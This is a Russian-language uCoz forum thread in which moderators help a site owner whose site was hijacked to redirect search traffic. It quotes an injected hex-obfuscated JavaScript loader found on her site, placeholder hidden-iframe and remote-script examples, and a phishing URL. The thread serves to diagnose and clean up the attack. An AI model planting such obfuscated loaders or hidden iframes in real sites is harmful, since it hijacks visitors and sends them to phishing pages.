   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » При заходе на сайт перекидывает на другой |
| При заходе на сайт перекидывает на другой |
 Описание проблемы: При попытке зайти на свой сайт вас прекидывает на совершенно чужой сайт. Это может происходить сразу, через какой-то промежуток времени или вместо вашей страницы вы видите чужую с чужим адресом  Причины возникновения: 1) Сторонние скрипты вставленные на сайт с подгрузкой с чужих адресов. И iframe вставки Если вы ставите к себе на сайт скрипт подобного вида Code <script type="text/javascript" src="http://levyisite.ru/nazvanie.js"></script> где levyisite.ru адрес не вашего сайта, а чужого, то вы всегда должны быть готовы к тому, что содержимое подгружаемого скрипта может изменится. Если скрипт работает в нормальном режиме сначала, то при изменении или удалении содержимого на сервере где он храниться, скрипт или перестанет работать или будет иметь уже другие функции, иногда вредоносные Если вы решили установить к себе на сайт скрипт, но ничего в скриптах не понимаете, перед установкой вы можете обратиться в эту тему //forum.ucoz.ru/forum/45-35735-1 и проверить его на безопасность 2) Сторонние скрипты вшитые в элементы дизайна или шаблонов найденные в открытом доступе Если вы все время находитесь в состоянии поиска новых украшений для своего сайта, таких как готовых блоков, информеров, измененных дизайнов мини-чатов, опросов, форм входа, вида материалов, блоков статистики на форум или сайт и так далее, то при копировании готового кода на сайтах, где это все раздают, проверяйте код на наличие сторонних скриптов (тип скрипта описан в пункте1) и iframe вставок. Если вы видите в коде конструкцию наподобии этой Code <iframe src="http://levyisite.ru" width="1" height="1"></iframe> Где levyisite.ru - это адрес чужого сайта а Code width="1" height="1" Code width="0" height="0" Если вы вообще не разбираетесь в HTML и не понимаете что копируете, то перед установкой очередного украшения на сайт вы можете проверить полученный код для вставки в этой теме //forum.ucoz.ru/forum/45-35735-1 на наличие вредоносных объектов 3) Рипы шаблонов и готовые шаблоны найденные в открытом доступе. В готовых шаблонах могут быть вшиты скрипты и iframe вставки, а так же рекламные блоки и спам скрытый посредством кода от вывода на экран. Вшитые скрипты и вставки могут быть с пустым содержимым и при запуске шаблона они могут не проявлять никаких признаков. Но подгруженные с чужих сайтов, содержимое может быть изменено, после чего может начаться вредоносная активность 4) Перехват домена. На сайтах с прикрепленным доменом, особенно у тех кто не имеет доступа к управлению доменом, сторонними лицами могут быть изменены настройки домена. Эффект может заключаться в том, что при переходе на свой сайт вы можете увидеть там совсем другой или будет происходить редирект на другой адрес  Если вы вообще ничего не поняли, но проблема переброски на чужие сайты с вашего у вас существует, то при обращении в эту тему вы должны дать ссылку на свой сайт, дать ссылку на сайт куда перебрасывает, а так же указать происходит это под логином или под гостем |
|
Скрипт попал на сайт усилиями того, что имеет доступ к файловому менеджеру через админ бар на сайте и доступ к редактированию содержимого страниц. то есть любой пользователь из группы администратор. у вас три администратора, два из которых действующие. и конечно это все можно проделать через панель управления
|
|
Пока написала, нашла
С 4 числа был вышит редирект при переходе с ПС на страницу _amsacquisitions.com/wp-content/themes/SBERBANK-ONLINE.RU/. 3го числа был добавлен в список админов этот левый чел http://uid.me/mr.rekoj_mr.rekoj1 Нашла в первом контейнере <script src="//goo.gl/6g1MUX"></script> такое. Остался вопрос, как в админах появился новый чел( пароли у меня сложные, ну буду менять сейчас. Если бы человек получил доступ в админку, он бы сделал все от админа и не стал бы назначать права своему аккаунту и с него воротить дела. Шаблон у меня купленный на utemplates. На сайте только проверенная годами реклама - гугл, ледикеш. Прям очень печально, что так ничего непонятно, подарила трафика за выходные пока была в отьезде очень щедро... Еще в "страницы сайта" был найден такой: Код Код<script>var _0xb4b0=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x36\x67\x31\x4D\x55\x58\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xb4b0[25]](_0xb4b0[0]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[3]+ _0xb4b0[4]+ _0xb4b0[5]+ _0xb4b0[6]+ _0xb4b0[7]+ _0xb4b0[8]+ _0xb4b0[9]+ _0xb4b0[10]+ _0xb4b0[11]+ _0xb4b0[12]+ _0xb4b0[13]+ _0xb4b0[14]+ _0xb4b0[15]+ _0xb4b0[16]+ _0xb4b0[17]+ _0xb4b0[18]+ _0xb4b0[19]+ _0xb4b0[20]+ _0xb4b0[1]+ _0xb4b0[2]+ _0xb4b0[21]+ _0xb4b0[22]+ _0xb4b0[23]+ _0xb4b0[24])</script> Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 06:35:26
|
|
Цитата Oksana5339 (  ) Это что за код был? Если перевести на человеческий: Код <script type="text/javascript" src="http://goo.gl/6g1MUX"></script> Сам скрипт вызывает перенаправление трафика на фишинговый сайт. |
|
Ну да, тот же, что в открытйю так же был прописан. Сейчас захожу с поисковика - опять. Пароли меняла, все удаляла, пароль админа не подошел, хотя я его записала и точно входила. Значит шаблон utemlate с уязвимостью продали или что?
Теперь я не могу пароль сменить, т.к. не знаю, на какой мне его поменяли... На аккаунте много сайтов, ломают только 1 Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:17:10
|
|
Oksana5339, укажите адрес сайта
|
|
webanet, muzh-zh*ena.ru
Только что удалила из 2 мест снова, на этот раз поставили хитрее. В страницы сайта - после многих переносов строк, в первый контейнер в середину. И сохранить дамп БД я не могу, видимо этот человек сделал уже (1 раз в 7 дней же) Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:32:29
|
|
Oksana5339, не удаляйте то что вы удаляете. нужно осмотреть что к чему. попробуйте перейти снова из поисковика
как только появится снова напишите сразу сюда или в тех.поддержку и ничего не трогайте |
|
Oksana5339, вы какой пароль меняли? пароль uid профиля или пароль администратора? пробовали старый пароль ввести при входе в пу?
|
|
webanet, меняла только пароль сайта, хотела уид, но реально не нашла, где и писала в поддержку.
Думала раньше, что не сильно тупая, но что-то не поняла. Старый пароль пробовала ввести, не помогло. И я точно с новым после смены входила. По логам 03.02.2017, 20:22 /index; editing site page mrrekoj (Администраторы) 94.46.163.230 Page ID: 1. Сегодня в логах никакие действия не прописаны. Орудовали с админки очевидно Добавлено (06 Фев 2017, 19:55:01) Сообщение отредактировал Oksana5339 - Понедельник, 06 Фев 2017, 19:52:46
|
|
Oksana5339, а где вы меняете пароль от админки?
|
|
Oksana5339, если появится снова ничего не трогайте и напишите сразу. особенно опишите подробно что вы делали до того как появился вредоносный код снова
|
| |||